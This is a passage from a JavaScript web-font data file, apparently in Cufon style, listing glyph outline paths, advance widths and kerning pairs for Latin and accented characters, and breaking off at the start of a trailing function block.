"w":560,"k":{"\u0153":70,"\u0152":20,"\u00f8":70,"\u00e7":70,"\u00e6":70,"\u00d8":20,"\u00d6":20,"\u00d5":20,"\u00d4":20,"\u00d3":20,"\u00d2":20,"\u00c7":20,"\u00c6":60,"\u00c5":60,"\u00c4":60,"\u00c3":60,"\u00c2":60,"\u00c1":60,"\u00c0":60,"z":46,"y":46,"x":46,"w":46,"v":46,"u":46,"s":70,"r":46,"q":70,"p":46,"o":70,"n":46,"m":46,"g":70,"e":70,"d":70,"c":70,"a":70,"Q":20,"O":20,"J":80,"G":20,"C":20,"A":60,".":80}},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm404,-761r-111,162r-77,0r75,-162r113,0","w":537,"k":{"y":10,"x":10,"w":7,"v":10}},{"w":1000},{"d":"721,0r-108,0r0,-476r-164,347r-80,0r-168,-347r0,476r-108,0r0,-712r108,0r208,443r204,-443r108,0r0,712","w":813},{"d":"568,0r-125,0r-155,-273r-154,273r-124,0r220,-365r-206,-347r124,0r140,255r141,-255r124,0r-206,347","w":578,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":26,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"190,-608r-112,0r0,-104r112,-93r0,197","w":268,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"s":60,"J":120,"A":80}},{"d":"629,0r-99,0r-329,-501r0,501r-108,0r0,-712r99,0r329,500r0,-500r108,0r0,712","w":722},{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0","w":468,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"o":10,"e":10,"c":10,"a":10,".":65}},{"d":"201,0r-108,0r0,-712r108,0r0,712","w":294},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72xm393,-761r-111,162r-77,0r75,-162r113,0","w":530},{"d":"337,-91v90,0,148,-62,148,-154r0,-467r108,0r0,472v3,143,-113,246,-256,246v-143,0,-255,-103,-255,-246r0,-472r108,0r0,467v-1,92,57,154,147,154xm492,-786r-92,0r0,-108r92,0r0,108xm276,-786r-92,0r0,-108r92,0r0,108","w":675},{"d":"538,-712r-146,290r87,0r0,78r-127,0r-26,51r0,52r153,0r0,78r-153,0r0,163r-108,0r0,-163r-153,0r0,-78r153,0r0,-52r-26,-51r-127,0r0,-78r87,0r-147,-290r118,0r150,314r148,-314r117,0","w":544},{"d":"619,-513v113,-2,182,78,182,189r0,324r-102,0r0,-309v2,-71,-38,-113,-102,-113v-61,0,-105,43,-105,108r0,314r-102,0r0,-309v1,-71,-36,-113,-102,-113v-65,0,-105,43,-105,113r0,309r-102,0r0,-507r100,0r0,51v68,-81,227,-76,279,17v41,-49,94,-74,159,-74","w":877},{"d":"316,-513v142,0,180,92,180,259v0,169,-37,260,-181,260v-56,0,-101,-20,-134,-60r0,54r-100,0r0,-712r102,0r0,256v32,-38,76,-57,133,-57xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"539,-712r-213,419r0,293r-108,0r0,-293r-213,-419r118,0r149,313r149,-313r118,0xm426,-786r-92,0r0,-108r92,0r0,108xm210,-786r-92,0r0,-108r92,0r0,108","w":544},{"d":"592,-513v151,1,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-54,51,-92,78,-189,79v-79,0,-137,-27,-175,-80v-35,53,-89,80,-163,80v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259v75,0,129,27,164,81v35,-54,89,-81,160,-81xm706,-295v-1,-81,-38,-130,-114,-133v-73,-3,-113,56,-114,133r228,0xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169","w":862},{"w":1000},{"d":"590,-504v0,100,-62,168,-142,189r164,315r-126,0r-150,-300r-135,0r0,300r-108,0r0,-712r276,0v128,-3,221,84,221,208xm361,-392v71,1,121,-41,121,-111v0,-70,-50,-113,-121,-112r-160,0r0,223r160,0","w":655,"k":{"J":16}},{"d":"441,-715v151,0,232,83,231,234r0,483r-96,-2r0,-50v-32,38,-74,57,-127,57v-126,0,-176,-90,-176,-241v0,-150,46,-241,175,-241v52,0,94,19,126,56v11,-125,-27,-206,-143,-206r-126,0v-91,0,-143,52,-142,145r0,312v1,62,13,79,50,110r-70,70v-56,-49,-79,-78,-79,-175r0,-318v-1,-152,79,-235,231,-234r146,0xm472,-80v85,0,102,-65,102,-154v0,-89,-17,-155,-102,-155v-85,0,-101,65,-101,155v0,90,16,154,101,154","w":736},{"d":"321,-414r-109,0r0,-109r109,0r0,109xm484,-230r-436,0r0,-95r436,0r0,95xm321,-33r-109,0r0,-109r109,0r0,109"},{"d":"235,-724v93,0,175,82,175,175v0,93,-82,174,-175,174v-93,0,-174,-81,-174,-174v0,-93,81,-175,174,-175xm235,-457v50,0,91,-42,91,-92v0,-50,-41,-93,-91,-93v-50,0,-90,43,-90,93v0,50,40,92,90,92","w":471},{"d":"404,-604r-92,0r0,-108r92,0r0,108xm188,-604r-92,0r0,-108r92,0r0,108","w":500},{"d":"424,-466r-37,65r-111,-69r4,131r-75,0r4,-131r-111,69r-37,-65r115,-61r-115,-62r37,-65r111,69r-4,-130r75,0r-4,130r111,-69r37,65r-115,62","w":485},{"d":"194,60r-116,95r0,-271r116,0r0,176","w":272},{"d":"355,0r-102,0r0,-601r-139,122r0,-113r139,-120r102,0r0,712"},{"d":"225,-285r-121,0r0,-122r121,0r0,122xm222,60r-116,95r0,-271r116,0r0,176","w":303},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm409,-761r-111,162r-77,0r75,-162r113,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"464,-507r-224,608v-23,75,-81,108,-182,100r0,-92v59,2,83,-8,99,-54r28,-79r-177,-483r108,0r121,357r118,-357r109,0xm388,-604r-92,0r0,-108r92,0r0,108xm172,-604r-92,0r0,-108r92,0r0,108","w":468},{"d":"363,-712v131,-3,228,89,228,216v0,127,-97,216,-228,216r-162,0r0,280r-108,0r0,-712r270,0xm357,-378v74,1,126,-44,126,-118v0,-74,-52,-120,-126,-119r-156,0r0,237r156,0","w":629,"k":{"\u0153":10,"\u00f8":10,"\u00e7":10,"\u00e6":10,"\u00c6":50,"\u00c5":50,"\u00c4":50,"\u00c3":50,"\u00c2":50,"\u00c1":50,"\u00c0":50,"s":10,"q":10,"o":10,"g":10,"e":10,"d":10,"c":10,"a":10,"J":120,"A":50,".":110}},{"d":"381,-608r-112,0r0,-104r112,-93r0,197xm190,-608r-112,0r0,-104r112,-93r0,197","w":459,"k":{"\u00c6":80,"\u00c5":80,"\u00c4":80,"\u00c3":80,"\u00c2":80,"\u00c1":80,"\u00c0":80,"J":120,"A":80}},{"d":"343,-712v194,2,265,135,256,351v-7,161,-7,218,-72,294v-82,95,-268,61,-434,67r0,-712r250,0xm453,-145v48,-55,37,-203,37,-307v0,-42,-16,-91,-37,-115v-50,-59,-150,-47,-252,-48r0,518v102,-2,201,10,252,-48","w":666,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":30,"A":10}},{"d":"186,-607r-108,0r0,-108r108,0r0,108xm-19,120v57,3,100,1,100,-59r0,-568r102,0r0,574v0,83,-51,142,-139,140r-63,0r0,-87","w":264},{"d":"366,-521r-101,0r0,-191r101,0r0,191xm179,-521r-101,0r0,-191r101,0r0,191","w":444},{"d":"259,-480v-2,66,37,85,103,79r0,90v-66,-5,-103,13,-103,79r0,167v-1,93,-46,140,-143,139r-71,0r0,-91r39,0v64,-1,73,-14,73,-78r0,-161v0,-60,26,-81,67,-100v-41,-19,-67,-40,-67,-100r0,-161v7,-81,-37,-79,-112,-78r0,-91r71,0v97,-1,142,46,143,139r0,167","w":407},{"d":"598,0r-108,0r0,-311r-289,0r0,311r-108,0r0,-712r108,0r0,304r289,0r0,-304r108,0r0,712","w":691},{"d":"186,-607r-108,0r0,-108r108,0r0,108xm183,0r-102,0r0,-507r102,0r0,507","w":264},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0xm325,-599r-77,0r-111,-162r113,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"200,0r-122,0r0,-122r122,0r0,122","w":278},{"d":"267,-42r-230,-230r230,-229r0,123r-107,106r107,107r0,123","w":339},{"d":"186,-91v84,0,129,-54,129,-142r0,-479r108,0r0,487v3,139,-102,232,-237,231v-69,0,-127,-23,-173,-69r72,-71v29,27,48,43,101,43","w":506,"k":{"A":10}},{"d":"225,-285r-121,0r0,-122r121,0r0,122xm225,0r-121,0r0,-122r121,0r0,122","w":303},{"w":250},{"d":"289,-624v-104,0,-170,108,-103,177v32,33,103,36,161,45v121,18,187,74,191,199v7,186,-226,247,-398,187v-40,-14,-77,-38,-110,-72r72,-71v45,45,106,68,182,68v84,1,145,-33,147,-109v3,-103,-100,-103,-190,-116v-112,-16,-186,-73,-187,-193v0,-130,101,-209,238,-209v89,0,163,27,221,81r-69,68v-39,-37,-90,-55,-155,-55","w":590,"k":{"Y":20,"S":10,"J":20}},{"d":"504,-648v96,72,78,266,71,430v-3,74,-26,107,-64,148v-73,79,-200,99,-307,49r-31,65r-82,0r51,-108v-94,-73,-78,-266,-71,-430v8,-181,206,-272,372,-197r30,-65r83,0xm403,-599v-88,-55,-206,1,-219,93v-8,59,-12,312,12,340xm463,-206v8,-58,12,-314,-12,-340r-207,433v87,55,206,-1,219,-93","w":652},{"d":"489,-366v60,24,107,81,107,165v0,128,-88,202,-215,201r-288,0r0,-712r277,0v126,-2,215,72,215,195v0,71,-46,131,-96,151xm361,-411v68,1,116,-35,116,-102v0,-67,-48,-103,-116,-102r-160,0r0,204r160,0xm371,-97v70,1,117,-42,117,-109v0,-66,-48,-108,-117,-108r-170,0r0,217r170,0","w":663,"k":{"J":23}},{"d":"343,-621v-84,0,-129,54,-129,142r0,88r129,0r0,78r-129,0r0,216r302,0r0,97r-411,0r0,-313r-62,0r0,-78r62,0r0,-96v-3,-139,103,-232,238,-231v69,0,127,23,173,69r-72,71v-29,-27,-48,-43,-101,-43","w":564},{"d":"975,-277r-392,391r-131,0r345,-343r-745,0r0,-97r745,0r-345,-343r131,0","w":1027},{"d":"309,-718v96,0,169,66,169,159v0,71,-73,128,-128,162r150,179v25,-35,37,-82,38,-143r98,0v-3,95,-27,168,-71,219r119,142r-131,0r-58,-70v-58,51,-124,76,-197,76v-140,0,-232,-77,-230,-212v1,-108,68,-149,141,-201v-37,-42,-71,-82,-74,-153v-3,-94,76,-158,174,-158xm309,-629v-42,0,-70,29,-70,70v0,23,18,55,55,98v34,-21,86,-59,86,-97v0,-39,-31,-71,-71,-71xm169,-208v-4,71,57,121,129,121v49,0,95,-18,136,-55r-169,-201v-51,35,-92,61,-96,135","w":730},{"d":"905,-231r-838,0r0,-97r838,0r0,97","w":972},{"d":"623,-426r-92,0r-20,124r79,0r0,94r-94,0r-33,208r-106,0r33,-208r-137,0r-32,208r-107,0r33,-208r-79,0r0,-94r94,0r20,-124r-81,0r0,-94r95,0r31,-196r107,0r-31,196r136,0r31,-196r106,0r-31,196r78,0r0,94xm424,-426r-136,0r-20,124r137,0","w":672},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm483,-781r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":603},{"d":"128,-806v72,77,104,89,104,211r0,478v-4,121,-33,134,-104,211r-70,-70v50,-54,70,-60,70,-147r0,-466v-2,-85,-20,-94,-70,-147","w":317},{"d":"386,-761r-111,162r-77,0r75,-162r113,0","w":500},{"d":"571,172r-571,0r0,-70r571,0r0,70","w":571},{"d":"648,0r-127,0r-200,-351r-120,144r0,207r-108,0r0,-712r108,0r0,358r291,-358r132,0r-231,279","w":658,"k":{"\u0152":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"y":34,"Q":10,"O":10,"J":-8,"G":10,"C":10}},{"d":"204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":277},{"d":"182,-726v38,0,94,44,130,43v19,0,38,-10,59,-31r48,47v-37,37,-71,55,-104,55v-39,0,-95,-43,-131,-42v-19,0,-38,10,-58,30r-48,-47v37,-37,71,-55,104,-55","w":500},{"d":"281,-85v50,0,68,-19,97,-48r70,67v-45,48,-101,72,-167,72v-151,0,-226,-101,-226,-260v0,-159,74,-259,226,-259v67,0,122,24,167,71r-70,68v-29,-30,-47,-48,-97,-48v-87,0,-124,64,-124,168v0,106,36,169,124,169xm319,64r-51,147r-101,0r70,-147r82,0","w":488,"k":{"\u0153":17,"\u00e6":8,"o":17,"e":17,"c":8,"a":8}},{"d":"268,6v-140,0,-207,-98,-207,-255v0,-142,47,-225,163,-247v27,-5,53,-4,76,2r-45,-81r-116,0r0,-72r78,0r-39,-70r108,0r39,70r87,0r0,72r-50,0v50,104,114,177,114,326v0,158,-67,255,-208,255xm268,-85v84,0,106,-58,106,-164v0,-107,-22,-164,-106,-164v-82,0,-105,58,-105,164v0,106,22,164,105,164","w":537},{"d":"484,-98r-95,0r0,-141r-341,0r0,-95r436,0r0,236"},{"d":"229,-716v114,0,169,77,169,206v0,130,-54,207,-169,207v-113,0,-168,-78,-168,-207v0,-129,55,-206,168,-206xm229,-377v69,0,85,-44,85,-133v0,-88,-16,-132,-85,-132v-67,0,-85,46,-85,132v1,87,17,133,85,133","w":458},{"d":"481,0r-123,0r-106,-173r-107,173r-123,0r174,-259r-167,-248r123,0r100,165r99,-165r123,0r-166,248","w":503,"k":{"\u0153":20,"\u00f8":20,"\u00f6":20,"\u00f5":20,"\u00f4":20,"\u00f3":20,"\u00f2":20,"\u00eb":20,"\u00ea":20,"\u00e9":20,"\u00e8":20,"\u00e7":20,"\u00e6":20,"o":20,"e":20,"c":20}},{"d":"190,0r-112,92r0,-197r112,0r0,105","w":267},{"d":"270,-718v110,0,202,79,200,191v-2,84,-84,169,-125,231v-17,25,-19,47,-18,84r-102,0v-11,-117,61,-174,112,-239v56,-73,23,-176,-67,-176v-58,0,-97,45,-97,101r-102,0v-2,-110,89,-192,199,-192xm332,0r-113,0r0,-109r113,0r0,109","w":511},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm363,-781r-77,0r-111,-162r113,0","w":603},{"d":"487,-621r-238,621r-110,0r239,-621r-217,0r0,112r-98,0r0,-203r424,0r0,91"},{"d":"319,64r-51,147r-101,0r70,-147r82,0","w":500},{"d":"227,-406v135,-46,250,59,250,195v0,127,-86,217,-210,217v-125,0,-213,-86,-211,-213v0,-46,18,-104,53,-175r162,-330r109,0xm266,-85v67,1,109,-54,109,-124v0,-69,-41,-123,-109,-123v-68,0,-108,52,-108,123v0,71,41,124,108,124"},{"d":"609,-521v11,52,10,283,-1,333v-22,106,-129,188,-249,188r-247,0r0,-318r-74,0r0,-83r74,0r0,-311r250,0v120,-6,225,87,247,191xm482,-159v45,-48,29,-251,22,-331v-7,-76,-75,-126,-155,-126r-129,0r0,215r138,0r0,83r-138,0r0,222v111,0,220,13,262,-63","w":684},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"405,-622r-310,0r0,-73r310,0r0,73","w":500},{"w":240},{"d":"422,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":500},{"d":"359,-230r-292,0r0,-95r292,0r0,95","w":426},{"d":"190,94v-75,-81,-104,-86,-104,-211r0,-478v5,-124,29,-130,104,-211r69,69v-38,37,-71,67,-71,148r0,466v-2,81,31,111,71,148","w":317},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97","w":603,"k":{"J":5}},{"d":"183,0r-102,0r0,-507r102,0r0,507xm425,-599r-85,0r-87,-97r-87,97r-85,0r129,-161r86,0","w":264},{"w":500},{"d":"860,-712r-186,712r-94,0r-145,-499r-144,499r-94,0r-186,-712r114,0r124,509r143,-509r87,0r143,509r124,-509r114,0","w":871,"k":{"\u0153":40,"\u0152":10,"\u00f8":40,"\u00e7":40,"\u00e6":40,"\u00d8":10,"\u00d6":10,"\u00d5":10,"\u00d4":10,"\u00d3":10,"\u00d2":10,"\u00c7":10,"\u00c6":14,"\u00c5":14,"\u00c4":14,"\u00c3":14,"\u00c2":14,"\u00c1":14,"\u00c0":14,"s":40,"q":40,"o":40,"g":40,"e":40,"d":40,"c":40,"a":40,"Q":10,"O":10,"G":10,"C":10,"A":14,".":50}},{"d":"725,0r-117,0r0,-117r117,0r0,117xm460,0r-117,0r0,-117r117,0r0,117xm195,0r-117,0r0,-117r117,0r0,117","w":803},{"d":"201,0r-108,0r0,-712r108,0r0,712xm281,-781r-77,0r-111,-162r113,0","w":294},{"d":"617,0r-115,0r-49,-143r-281,0r-49,143r-115,0r261,-712r87,0xm423,-235r-108,-316r-111,316r219,0xm361,-781r-77,0r-111,-162r113,0","w":625,"k":{"\u0152":5,"y":21,"v":21,"Y":35,"W":21,"V":35,"T":60,"Q":10,"O":10,"G":10,"C":10}},{"d":"526,0r-126,0r-142,-234r-75,85r0,149r-102,0r0,-712r102,0r0,439r197,-234r124,0r-176,199","w":548,"k":{"\u0153":13,"\u00f6":13,"\u00f5":13,"\u00f4":13,"\u00f3":13,"\u00f2":13,"\u00eb":13,"\u00ea":13,"\u00e9":13,"\u00e8":13,"\u00e7":13,"\u00e6":13,"q":13,"o":13,"g":13,"e":13,"d":13,"c":13}},{"d":"63,-440v46,-53,89,-72,182,-73v139,0,209,58,209,174r0,339r-100,0r0,-46v-36,35,-68,51,-135,52v-107,2,-176,-54,-176,-155v0,-95,71,-146,175,-146r134,0v7,-89,-23,-133,-111,-131v-60,1,-83,14,-111,49xm235,-79v94,0,126,-44,117,-145v-89,1,-210,-18,-210,73v0,48,31,72,93,72","w":530},{"d":"974,-229r-744,0r345,343r-131,0r-392,-391r392,-392r131,0r-345,343r744,0r0,97","w":1027},{"d":"316,-513v110,0,176,74,176,189r0,324r-102,0r0,-309v1,-71,-36,-113,-102,-113v-65,0,-105,43,-105,113r0,309r-102,0r0,-507r100,0r0,51v35,-38,80,-57,135,-57","w":568},{"d":"181,-452v46,-69,195,-86,256,-13r-77,77v-64,-72,-177,-20,-177,80r0,308r-102,0r0,-507r100,0r0,55","w":439,"k":{"\u0153":32,"\u00f8":32,"\u00f6":32,"\u00f5":32,"\u00f4":32,"\u00f3":32,"\u00f2":32,"\u00eb":32,"\u00ea":32,"\u00e9":32,"\u00e8":32,"\u00e7":32,"\u00e6":32,"s":10,"q":32,"o":32,"g":32,"e":32,"d":32,"c":32,"a":10,".":120}},{"w":240},{"d":"270,-513v151,0,228,121,215,289r-329,0v-1,85,45,143,129,142v63,-1,88,-18,123,-52r65,61v-52,50,-95,79,-190,79v-151,0,-228,-93,-228,-260v0,-151,75,-259,215,-259xm384,-295v6,-104,-91,-167,-176,-115v-36,22,-50,58,-52,115r228,0","w":539,"k":{"y":10,"x":10,"w":7,"v":10}},{"d":"548,0r-455,0r0,-712r455,0r0,97r-347,0r0,208r296,0r0,96r-296,0r0,214r347,0r0,97xm465,-786r-92,0r0,-108r92,0r0,108xm249,-786r-92,0r0,-108r92,0r0,108","w":603},{"d":"372,-391v-46,-45,-212,-64,-217,28v-4,63,89,59,150,65v101,9,151,56,151,143v0,196,-326,198,-424,88r67,-67v35,35,83,53,146,53v57,0,108,-19,111,-70v4,-65,-87,-61,-149,-67v-100,-9,-150,-55,-150,-140v0,-99,89,-155,191,-155v82,0,145,19,188,57","w":499,"k":{"\u2019":32,"v":10,"t":10,"s":10}},{"d":"200,-217r-122,0r0,-122r122,0r0,122","w":278},{"d":"271,-718v147,0,248,135,191,276v-9,22,-28,48,-52,78r-223,273r290,0r0,91r-414,0r0,-91r274,-333v68,-69,43,-206,-66,-203v-64,2,-107,40,-105,110r-102,0v-2,-119,88,-201,207,-201"},{"d":"304,74r-218,0r0,-860r218,0r0,91r-116,0r0,678r116,0r0,91","w":347},{"w":55},{"d":"67,-658v37,-42,71,-57,146,-58v111,0,166,46,166,139r0,270r-81,0r0,-36v-27,27,-62,40,-106,40v-86,1,-140,-41,-140,-123v0,-76,57,-117,139,-117r105,0v5,-70,-18,-104,-87,-102v-48,1,-63,11,-87,39xm204,-373v76,0,98,-32,92,-112v-69,1,-163,-15,-163,57v0,37,24,55,71,55","w":452},{"d":"261,74r-218,0r0,-90r118,0r0,-680r-118,0r0,-90r218,0r0,860","w":347},{"d":"323,-91v81,0,130,-53,145,-122r109,0v-20,129,-113,219,-254,219v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-285,255,-285v142,0,234,89,254,219r-110,0v-16,-69,-63,-121,-144,-122v-74,-1,-125,48,-139,115v-9,47,-9,254,0,300v14,67,65,115,139,115xm374,64r-51,147r-101,0r70,-147r82,0","w":628,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"520,-42r-230,-230r230,-229r0,123r-108,106r108,107r0,123xm267,-42r-230,-230r230,-229r0,123r-107,106r107,107r0,123","w":592},{"d":"323,-91v104,-1,165,-80,152,-202r-152,0r0,-92r260,0r0,109v5,177,-104,282,-260,282v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-283,255,-285v145,-2,239,96,259,221r-109,0v-17,-73,-65,-123,-150,-124v-72,-1,-125,49,-139,115v-9,46,-9,254,0,300v14,67,65,116,139,115","w":649,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":35,"A":10}},{"d":"266,-718v117,0,206,84,206,204r0,316v3,120,-89,204,-206,204v-116,0,-205,-84,-205,-204r0,-316v-3,-120,89,-204,205,-204xm266,-85v65,0,105,-50,104,-116r0,-310v1,-66,-39,-116,-104,-116v-66,0,-104,49,-103,116r0,310v-1,67,37,116,103,116"},{"d":"180,-146v-5,59,43,62,100,59r0,87r-63,0v-88,2,-139,-57,-139,-140r0,-572r102,0r0,566","w":311,"k":{"\u201d":60,"\u201c":60,"\u2019":60,"\u2018":60,"y":29,"w":20,"v":40,"o":20,"e":25,"c":25,"*":60}},{"d":"323,-91v81,0,130,-53,145,-122r109,0v-20,129,-113,219,-254,219v-152,0,-264,-107,-255,-285r0,-154v-8,-175,101,-285,255,-285v142,0,234,89,254,219r-110,0v-16,-69,-63,-121,-144,-122v-74,-1,-125,48,-139,115v-9,47,-9,254,0,300v14,67,65,115,139,115","w":628,"k":{"\u00c6":10,"\u00c5":10,"\u00c4":10,"\u00c3":10,"\u00c2":10,"\u00c1":10,"\u00c0":10,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":26,"A":10}},{"d":"768,-61r-40,0r0,61r-74,0r0,-61r-174,0r0,-71r147,-295r83,0r-147,295r91,0r0,-83r74,0r0,83r40,0r0,71xm596,-712r-335,712r-81,0r335,-712r81,0xm204,-285r-77,0r0,-341r-87,76r0,-87r87,-75r77,0r0,427","w":808},{"d":"316,-513v142,0,180,92,180,259v0,168,-37,260,-180,260v-56,0,-100,-19,-133,-58r0,257r-102,0r0,-917r102,0r0,256v32,-38,76,-57,133,-57xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":554},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113xm417,-761r-111,162r-77,0r75,-162r113,0","w":568},{"d":"97,-576v0,-80,54,-144,139,-141r64,0r0,87v-57,-3,-101,0,-101,59r0,73r101,0r0,78r-101,0r0,420r-102,0r0,-420r-58,0r0,-78r58,0r0,-78","w":328,"k":{"\u201d":-20,"\u201c":-20,"\u2019":-20,"\u2018":-20,"\u0153":17,"\u00e7":17,"\u00e6":17,"o":17,"e":17,"c":17,"a":17,".":50,"*":-20}},{"d":"503,-401r-106,0r-112,-207r-112,207r-106,0r172,-318r93,0","w":571},{"d":"579,-356v0,124,-1,188,-46,259r70,69r-60,60r-71,-71v-118,88,-311,34,-370,-77v-47,-87,-34,-246,-31,-378v6,-218,299,-292,440,-148v62,63,68,158,68,286xm450,-180v26,-32,21,-269,13,-326v-14,-110,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v40,48,124,60,179,21r-75,-75r60,-60","w":646},{"d":"504,0r-456,0r0,-93r329,-522r-315,0r0,-97r442,0r0,88r-331,527r331,0r0,97","w":552},{"d":"315,-513v143,0,181,91,181,259v0,168,-37,260,-180,260v-56,0,-100,-19,-133,-58r0,257r-102,0r0,-712r100,0r0,54v33,-40,78,-60,134,-60xm289,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"232,0v-85,3,-139,-61,-139,-141r0,-279r-58,0r0,-78r58,0r0,-154r102,0r0,154r98,0r0,78r-98,0r0,274v-3,57,41,63,98,59r0,87r-61,0","w":342,"k":{"\u0153":5,"\u00e7":5,"\u00e6":5,"o":5,"e":5,"c":5,"a":5}},{"d":"511,-642v87,86,69,267,64,424v-2,74,-26,107,-64,148v-94,102,-275,96,-375,0v-83,-80,-70,-266,-65,-424v7,-218,297,-290,440,-148xm429,-135v63,-47,42,-275,34,-371v-9,-111,-174,-156,-246,-71v-47,55,-42,100,-42,221v0,121,-4,165,42,221v49,59,162,59,212,0xm459,-943r-111,162r-77,0r75,-162r113,0","w":647,"k":{"\u00c6":5,"Y":10,"X":10,"W":10,"V":10,"T":20,"J":21,"A":10}},{"d":"302,-599r-77,0r-111,-162r113,0","w":500},{"d":"250,-95v-7,81,37,79,112,78r0,91r-71,0v-97,1,-142,-46,-143,-139r0,-167v2,-66,-37,-85,-103,-79r0,-90v66,5,103,-13,103,-79r0,-167v1,-93,46,-140,143,-139r71,0r0,91r-39,0v-64,1,-73,14,-73,78r0,161v0,60,-25,81,-66,100v41,19,66,40,66,100r0,161","w":407},{"d":"482,-327r-431,0r0,-95r431,0r0,95xm482,-133r-431,0r0,-95r431,0r0,95"},{"d":"57,-254v0,-167,38,-259,180,-259v57,0,101,19,133,57r0,-256r102,0r0,712r-100,0r0,-54v-33,40,-78,60,-134,60v-143,0,-181,-92,-181,-260xm265,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"280,-85v65,0,105,-43,105,-113r0,-309r102,0r0,507r-100,0r0,-51v-35,38,-80,57,-135,57v-110,0,-176,-74,-176,-189r0,-324r102,0r0,309v-1,70,37,113,102,113","w":568},{"d":"57,-254v0,-168,38,-259,181,-259v56,0,101,20,134,60r0,-54r100,0r0,712r-102,0r0,-257v-33,39,-77,58,-133,58v-142,0,-180,-92,-180,-260xm265,-85v91,0,105,-76,105,-169v0,-93,-14,-168,-105,-168v-89,0,-107,71,-106,168v1,92,14,168,106,169","w":553},{"d":"463,-507r-186,507r-83,0r-186,-507r108,0r120,357r119,-357r108,0","w":471,"k":{"\u0153":10,"\u00f8":10,"\u00f6":10,"\u00f5":10,"\u00f4":10,"\u00f3":10,"\u00f2":10,"\u00eb":10,"\u00ea":10,"\u00e9":10,"\u00e8":10,"\u00e7":10,"\u00e6":10,"s":10,"o":10,"e":10,"c":10,"a":10,".":65}},{"d":"380,74r-98,0r-282,-852r98,0","w":380},{"d":"268,-513v142,0,212,100,212,259v0,164,-68,260,-212,260v-143,0,-211,-97,-211,-260v0,-159,70,-259,211,-259xm268,-85v86,0,110,-60,110,-169v-1,-110,-22,-168,-110,-168v-86,0,-108,59,-109,168v0,109,24,169,109,169xm313,-599r-77,0r-111,-162r113,0","w":537,"k":{"y":10,"x":10,"w":7,"v":10}}],f:f};try{(function(s){var 